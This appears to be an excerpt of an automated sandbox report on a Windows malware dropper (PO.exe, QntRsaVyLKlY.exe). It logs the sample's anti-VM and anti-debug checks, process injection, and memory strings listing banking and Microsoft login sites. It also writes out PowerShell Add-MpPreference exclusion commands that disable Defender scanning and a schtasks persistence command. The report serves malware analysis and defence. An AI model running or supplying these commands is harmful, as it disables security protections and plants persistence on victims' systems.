                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 16F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 50A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 7CB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 8CB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 8E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 9E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 50C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 1030000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 29B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 49B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 6EF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 7EF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 6EF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 2DD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 2FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeMemory allocated: 4FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5101Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 449Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4897Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 552Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWindow / User API: threadDelayed 1857Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWindow / User API: threadDelayed 4655Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWindow / User API: threadDelayed 2137
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWindow / User API: threadDelayed 5262
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 5792Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 8008Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 7840Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 7848Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 5952Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C7286D FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C7286D
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C8CBE4 FindFirstFileExA,0_2_00C8CBE4
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C7F3FB SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00C7F3FB
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C816BE VirtualQuery,GetSystemInfo,0_2_00C816BE
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: tmpF307.tmp.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: tmpF307.tmp.15.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: tmpF307.tmp.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: tmpF307.tmp.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: tmpF307.tmp.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmpF307.tmp.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: tmpF307.tmp.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: tmpF307.tmp.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: tmpF307.tmp.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: tmpF307.tmp.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmpF307.tmp.15.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmpF307.tmp.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: PO.exe, 0000000F.00000002.2263302210.000000000141F000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2348376526.0000000001200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmpF307.tmp.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmpF307.tmp.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmpF307.tmp.15.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: tmpF307.tmp.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: tmpF307.tmp.15.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmpF307.tmp.15.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: owKQ0b029a.exe, 00000000.00000003.2162645092.00000000011DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0
                    Source: tmpF307.tmp.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: tmpF307.tmp.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: QntRsaVyLKlY.exe, 00000011.00000002.2246709726.0000000006DB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: tmpF307.tmp.15.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: tmpF307.tmp.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: tmpF307.tmp.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeAPI call chain: ExitProcess graph end nodegraph_0-19183
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C8A957 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C8A957
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C897B3 mov eax, dword ptr fs:[00000030h]0_2_00C897B3
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C8D895 GetProcessHeap,0_2_00C8D895
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C8A957 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C8A957
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C82AC7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C82AC7
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C82655 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C82655
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C827A3 SetUnhandledExceptionFilter,0_2_00C827A3
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory written: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeProcess created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C824AB cpuid 0_2_00C824AB
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00C7E1A3
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
